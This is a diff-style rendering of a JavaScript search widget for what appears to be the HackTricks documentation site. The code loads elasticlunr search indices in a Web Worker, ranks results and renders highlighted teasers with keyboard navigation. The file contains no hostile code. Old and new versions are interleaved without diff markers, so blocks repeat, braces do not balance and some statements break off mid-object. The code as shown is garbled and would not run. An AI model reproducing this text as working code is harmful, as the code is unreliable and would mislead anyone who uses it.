|       self.onmessage = ({data:q}) => { | ||||
|         if(!q){ postMessage([]); return; } | ||||
| 
 | ||||
|         const all = []; | ||||
|         for(const s of built){ | ||||
|           const res = s.idx.search(q,opts); | ||||
|           if(!res.length) continue; | ||||
|           const max = res[0].score || 1; | ||||
|           res.forEach(r => { | ||||
|             const doc = s.idx.documentStore.getDoc(r.ref); | ||||
|             all.push({ | ||||
|               norm : r.score / max, | ||||
|               title: doc.title, | ||||
|               body : doc.body, | ||||
|               breadcrumbs: doc.breadcrumbs, | ||||
|               url  : s.base + s.urls[r.ref], | ||||
|               cloud: s.cloud | ||||
|         const indices = []; | ||||
|         const main = await loadWithFallback(MAIN_REMOTE_SOURCES , '/searchindex-book.js',        false); if(main)  indices.push(main); | ||||
|         const cloud= await loadWithFallback(CLOUD_REMOTE_SOURCES, '/searchindex.js',  true ); if(cloud) indices.push(cloud);   | ||||
|         if(!indices.length){ postMessage({ready:false, error:'no-index'}); return; } | ||||
|    | ||||
|         /* build index objects */ | ||||
|         built = indices.map(d => ({ | ||||
|           idx : elasticlunr.Index.load(d.json), | ||||
|           urls: d.urls, | ||||
|           cloud: d.cloud, | ||||
|           base: d.cloud ? 'https://cloud.hacktricks.wiki/' : '' | ||||
|         })); | ||||
|    | ||||
|         postMessage({ready:true}); | ||||
|         return; | ||||
|       } | ||||
|        | ||||
|       const q = data.query || data; | ||||
|       if(!q){ postMessage([]); return; } | ||||
|    | ||||
|           const all = []; | ||||
|           for(const s of built){ | ||||
|             const res = s.idx.search(q,opts); | ||||
|             if(!res.length) continue; | ||||
|             const max = res[0].score || 1; | ||||
|             res.forEach(r => { | ||||
|               const doc = s.idx.documentStore.getDoc(r.ref); | ||||
|               all.push({ | ||||
|                 norm : r.score / max, | ||||
|                 title: doc.title, | ||||
|                 body : doc.body, | ||||
|                 breadcrumbs: doc.breadcrumbs, | ||||
|                 url  : s.base + s.urls[r.ref], | ||||
|                 cloud: s.cloud | ||||
|               }); | ||||
|             }); | ||||
|           }); | ||||
|         } | ||||
|         all.sort((a,b)=>b.norm-a.norm); | ||||
|         postMessage(all.slice(0,MAX)); | ||||
|       }; | ||||
|     })(); | ||||
|   `;
 | ||||
|           } | ||||
|           all.sort((a,b)=>b.norm-a.norm); | ||||
|           postMessage(all.slice(0,MAX)); | ||||
|     }; | ||||
|     `;
 | ||||
|    | ||||
|     /* ───────────── 2. spawn worker ───────────── */ | ||||
|     const worker = new Worker(URL.createObjectURL(new Blob([workerCode],{type:'application/javascript'}))); | ||||
|      | ||||
|     /* ───────────── 2.1. initialize worker with language ───────────── */ | ||||
|     const htmlLang = (document.documentElement.lang || 'en').toLowerCase(); | ||||
|     const lang = htmlLang.split('-')[0]; | ||||
|     worker.postMessage({type: 'init', lang: lang}); | ||||
|    | ||||
|     /* ───────────── 3. DOM refs ─────────────── */ | ||||
|     const wrap    = document.getElementById('search-wrapper'); | ||||
|     const bar     = document.getElementById('searchbar'); | ||||
|     const list    = document.getElementById('searchresults'); | ||||
|     const listOut = document.getElementById('searchresults-outer'); | ||||
|     const header  = document.getElementById('searchresults-header'); | ||||
|     const icon    = document.getElementById('search-toggle'); | ||||
|    | ||||
|     const READY_ICON = icon.innerHTML; | ||||
|     icon.textContent = '⏳'; | ||||
|     icon.setAttribute('aria-label','Loading search …'); | ||||
|       icon.setAttribute('title','Search is loading, please wait...'); | ||||
| 
 | ||||
|   /* ───────────── 2. spawn worker ───────────── */ | ||||
|   const worker = new Worker(URL.createObjectURL(new Blob([workerCode],{type:'application/javascript'}))); | ||||
| 
 | ||||
|   /* ───────────── 3. DOM refs ─────────────── */ | ||||
|   const wrap    = document.getElementById('search-wrapper'); | ||||
|   const bar     = document.getElementById('searchbar'); | ||||
|   const list    = document.getElementById('searchresults'); | ||||
|   const listOut = document.getElementById('searchresults-outer'); | ||||
|   const header  = document.getElementById('searchresults-header'); | ||||
|   const icon    = document.getElementById('search-toggle'); | ||||
| 
 | ||||
|   const READY_ICON = icon.innerHTML; | ||||
|   icon.textContent = '⏳'; | ||||
|   icon.setAttribute('aria-label','Loading search …'); | ||||
|   icon.setAttribute('title','Search is loading, please wait...'); | ||||
| 
 | ||||
|   const HOT=83, ESC=27, DOWN=40, UP=38, ENTER=13; | ||||
|   let debounce, teaserCount=0; | ||||
| 
 | ||||
|   /* ───────────── helpers (teaser, metric) ───────────── */ | ||||
|   const escapeHTML = (()=>{const M={'&':'&amp;','<':'&lt;','>':'&gt;','"':'&quot;','\'':'&#39;'};return s=>s.replace(/[&<>'"]/g,c=>M[c]);})(); | ||||
|   const URL_MARK='highlight'; | ||||
|   function metric(c,t){return c?`${c} search result${c>1?'s':''} for '${t}':`:`No search results for '${t}'.`;} | ||||
| 
 | ||||
|   function makeTeaser(body,terms){ | ||||
|     const stem=w=>elasticlunr.stemmer(w.toLowerCase()); | ||||
|     const T=terms.map(stem),W_S=40,W_F=8,W_N=2,WIN=30; | ||||
|     const W=[],sents=body.toLowerCase().split('. '); | ||||
|     let i=0,v=W_F,found=false; | ||||
|     sents.forEach(s=>{v=W_F; s.split(' ').forEach(w=>{ if(w){ if(T.some(t=>stem(w).startsWith(t))){v=W_S;found=true;} W.push([w,v,i]); v=W_N;} i+=w.length+1; }); i++;}); | ||||
|     if(!W.length) return body; | ||||
|     const win=Math.min(W.length,WIN); | ||||
|     const sums=[W.slice(0,win).reduce((a,[,wt])=>a+wt,0)]; | ||||
|     for(let k=1;k<=W.length-win;k++) sums[k]=sums[k-1]-W[k-1][1]+W[k+win-1][1]; | ||||
|     const best=found?sums.lastIndexOf(Math.max(...sums)):0; | ||||
|     const out=[]; i=W[best][2]; | ||||
|     for(let k=best;k<best+win;k++){const [w,wt,pos]=W[k]; if(i<pos){out.push(body.substring(i,pos)); i=pos;} if(wt===W_S) out.push('<em>'); out.push(body.substr(pos,w.length)); if(wt===W_S) out.push('</em>'); i=pos+w.length;} | ||||
|     return out.join(''); | ||||
|   } | ||||
| 
 | ||||
|   function format(d,terms){ | ||||
|     const teaser=makeTeaser(escapeHTML(d.body),terms); | ||||
|     teaserCount++; | ||||
|     const enc=encodeURIComponent(terms.join(' ')).replace(/'/g,'%27'); | ||||
|     const parts=d.url.split('#'); if(parts.length===1) parts.push(''); | ||||
|     const abs=d.url.startsWith('http'); | ||||
|     const href=`${abs?'':path_to_root}${parts[0]}?${URL_MARK}=${enc}#${parts[1]}`; | ||||
|     const style=d.cloud?" style=\"color:#1e88e5\"":""; | ||||
|     const isCloud=d.cloud?" [Cloud]":" [Book]"; | ||||
|     return `<a href="${href}" aria-details="teaser_${teaserCount}"${style}>`+ | ||||
|            `${d.breadcrumbs}${isCloud}<span class="teaser" id="teaser_${teaserCount}" aria-label="Search Result Teaser">${teaser}</span></a>`; | ||||
|   } | ||||
| 
 | ||||
|   /* ───────────── UI control ───────────── */ | ||||
|   function showUI(s){wrap.classList.toggle('hidden',!s); icon.setAttribute('aria-expanded',s); if(s){window.scrollTo(0,0); bar.focus(); bar.select();} else {listOut.classList.add('hidden'); [...list.children].forEach(li=>li.classList.remove('focus'));}} | ||||
|   function blur(){const t=document.createElement('input'); t.style.cssText='position:absolute;opacity:0;'; icon.appendChild(t); t.focus(); t.remove();} | ||||
| 
 | ||||
|   icon.addEventListener('click',()=>showUI(wrap.classList.contains('hidden'))); | ||||
| 
 | ||||
|   document.addEventListener('keydown',e=>{ | ||||
|     if(e.altKey||e.ctrlKey||e.metaKey||e.shiftKey) return; | ||||
|     const f=/^(?:input|select|textarea)$/i.test(e.target.nodeName); | ||||
|     if(e.keyCode===HOT && !f){e.preventDefault(); showUI(true);} else if(e.keyCode===ESC){e.preventDefault(); showUI(false); blur();} | ||||
|     else if(e.keyCode===DOWN && document.activeElement===bar){e.preventDefault(); const first=list.firstElementChild; if(first){blur(); first.classList.add('focus');}} | ||||
|     else if([DOWN,UP,ENTER].includes(e.keyCode) && document.activeElement!==bar){const cur=list.querySelector('li.focus'); if(!cur) return; e.preventDefault(); if(e.keyCode===DOWN){const nxt=cur.nextElementSibling; if(nxt){cur.classList.remove('focus'); nxt.classList.add('focus');}} else if(e.keyCode===UP){const prv=cur.previousElementSibling; cur.classList.remove('focus'); if(prv){prv.classList.add('focus');} else {bar.focus();}} else {const a=cur.querySelector('a'); if(a) window.location.assign(a.href);}} | ||||
|   }); | ||||
| 
 | ||||
|   bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage(e.target.value.trim()),120); }); | ||||
| 
 | ||||
|   /* ───────────── worker messages ───────────── */ | ||||
|   worker.onmessage = ({data}) => { | ||||
|     if(data && data.ready!==undefined){ | ||||
|       if(data.ready){  | ||||
|         icon.innerHTML=READY_ICON;  | ||||
|         icon.setAttribute('aria-label','Open search (S)');  | ||||
|         icon.removeAttribute('title'); | ||||
|       } | ||||
|       else {  | ||||
|         icon.textContent='❌';  | ||||
|         icon.setAttribute('aria-label','Search unavailable');  | ||||
|         icon.setAttribute('title','Search is unavailable'); | ||||
|       } | ||||
|       return; | ||||
|    | ||||
|     const HOT=83, ESC=27, DOWN=40, UP=38, ENTER=13; | ||||
|     let debounce, teaserCount=0; | ||||
|    | ||||
|     /* ───────────── helpers (teaser, metric) ───────────── */ | ||||
|     const escapeHTML = (()=>{const M={'&':'&amp;','<':'&lt;','>':'&gt;','"':'&quot;','\'':'&#39;'};return s=>s.replace(/[&<>'"]/g,c=>M[c]);})(); | ||||
|     const URL_MARK='highlight'; | ||||
|     function metric(c,t){return c?`${c} search result${c>1?'s':''} for '${t}':`:`No search results for '${t}'.`;} | ||||
|    | ||||
|     function makeTeaser(body,terms){ | ||||
|       const stem=w=>elasticlunr.stemmer(w.toLowerCase()); | ||||
|       const T=terms.map(stem),W_S=40,W_F=8,W_N=2,WIN=30; | ||||
|       const W=[],sents=body.toLowerCase().split('. '); | ||||
|       let i=0,v=W_F,found=false; | ||||
|       sents.forEach(s=>{v=W_F; s.split(' ').forEach(w=>{ if(w){ if(T.some(t=>stem(w).startsWith(t))){v=W_S;found=true;} W.push([w,v,i]); v=W_N;} i+=w.length+1; }); i++;}); | ||||
|       if(!W.length) return body; | ||||
|       const win=Math.min(W.length,WIN); | ||||
|       const sums=[W.slice(0,win).reduce((a,[,wt])=>a+wt,0)]; | ||||
|       for(let k=1;k<=W.length-win;k++) sums[k]=sums[k-1]-W[k-1][1]+W[k+win-1][1]; | ||||
|       const best=found?sums.lastIndexOf(Math.max(...sums)):0; | ||||
|       const out=[]; i=W[best][2]; | ||||
|       for(let k=best;k<best+win;k++){const [w,wt,pos]=W[k]; if(i<pos){out.push(body.substring(i,pos)); i=pos;} if(wt===W_S) out.push('<em>'); out.push(body.substr(pos,w.length)); if(wt===W_S) out.push('</em>'); i=pos+w.length;} | ||||
|       return out.join(''); | ||||
|     } | ||||
|     const docs=data, q=bar.value.trim(), terms=q.split(/\s+/).filter(Boolean); | ||||
|     header.textContent=metric(docs.length,q); | ||||
|     clear(list); | ||||
|     docs.forEach(d=>{const li=document.createElement('li'); li.innerHTML=format(d,terms); list.appendChild(li);}); | ||||
|     listOut.classList.toggle('hidden',!docs.length); | ||||
|   }; | ||||
| })(); | ||||
| 
 | ||||
|    | ||||
|     function format(d,terms){ | ||||
|       const teaser=makeTeaser(escapeHTML(d.body),terms); | ||||
|       teaserCount++; | ||||
|       const enc=encodeURIComponent(terms.join(' ')).replace(/'/g,'%27'); | ||||
|       const parts=d.url.split('#'); if(parts.length===1) parts.push(''); | ||||
|       const abs=d.url.startsWith('http'); | ||||
|       const href=`${abs?'':path_to_root}${parts[0]}?${URL_MARK}=${enc}#${parts[1]}`; | ||||
|       const style=d.cloud?" style=\"color:#1e88e5\"":""; | ||||
|       const isCloud=d.cloud?" [Cloud]":" [Book]"; | ||||
|       return `<a href="${href}" aria-details="teaser_${teaserCount}"${style}>`+ | ||||
|              `${d.breadcrumbs}${isCloud}<span class="teaser" id="teaser_${teaserCount}" aria-label="Search Result Teaser">${teaser}</span></a>`; | ||||
|     } | ||||
|    | ||||
|     /* ───────────── UI control ───────────── */ | ||||
|     function showUI(s){wrap.classList.toggle('hidden',!s); icon.setAttribute('aria-expanded',s); if(s){window.scrollTo(0,0); bar.focus(); bar.select();} else {listOut.classList.add('hidden'); [...list.children].forEach(li=>li.classList.remove('focus'));}} | ||||
|     function blur(){const t=document.createElement('input'); t.style.cssText='position:absolute;opacity:0;'; icon.appendChild(t); t.focus(); t.remove();} | ||||
|    | ||||
|     icon.addEventListener('click',()=>showUI(wrap.classList.contains('hidden'))); | ||||
|    | ||||
|     document.addEventListener('keydown',e=>{ | ||||
|       if(e.altKey||e.ctrlKey||e.metaKey||e.shiftKey) return; | ||||
|       const f=/^(?:input|select|textarea)$/i.test(e.target.nodeName); | ||||
|       if(e.keyCode===HOT && !f){e.preventDefault(); showUI(true);} else if(e.keyCode===ESC){e.preventDefault(); showUI(false); blur();} | ||||
|       else if(e.keyCode===DOWN && document.activeElement===bar){e.preventDefault(); const first=list.firstElementChild; if(first){blur(); first.classList.add('focus');}} | ||||
|       else if([DOWN,UP,ENTER].includes(e.keyCode) && document.activeElement!==bar){const cur=list.querySelector('li.focus'); if(!cur) return; e.preventDefault(); if(e.keyCode===DOWN){const nxt=cur.nextElementSibling; if(nxt){cur.classList.remove('focus'); nxt.classList.add('focus');}} else if(e.keyCode===UP){const prv=cur.previousElementSibling; cur.classList.remove('focus'); if(prv){prv.classList.add('focus');} else {bar.focus();}} else {const a=cur.querySelector('a'); if(a) window.location.assign(a.href);}} | ||||
|     }); | ||||
|    | ||||
|     bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage({query: e.target.value.trim()}),120); }); | ||||
|    | ||||
|     /* ───────────── worker messages ───────────── */ | ||||
|     worker.onmessage = ({data}) => { | ||||
|       if(data && data.ready!==undefined){ | ||||
|         if(data.ready){  | ||||
|           icon.innerHTML=READY_ICON;  | ||||
|           icon.setAttribute('aria-label','Open search (S)');  | ||||
|           icon.removeAttribute('title'); | ||||
|         } | ||||
|         else {  | ||||
|           icon.textContent='❌';  | ||||
|           icon.setAttribute('aria-label','Search unavailable');  | ||||
|           icon.setAttribute('title','Search is unavailable'); | ||||
|         } | ||||
|         return; | ||||
|       } | ||||
|       const docs=data, q=bar.value.trim(), terms=q.split(/\s+/).filter(Boolean); | ||||
|       header.textContent=metric(docs.length,q); | ||||
|       clear(list); | ||||
|       docs.forEach(d=>{const li=document.createElement('li'); li.innerHTML=format(d,terms); list.appendChild(li);}); | ||||
|       listOut.classList.toggle('hidden',!docs.length); | ||||
|     }; | ||||
|   })(); | ||||
|    | ||||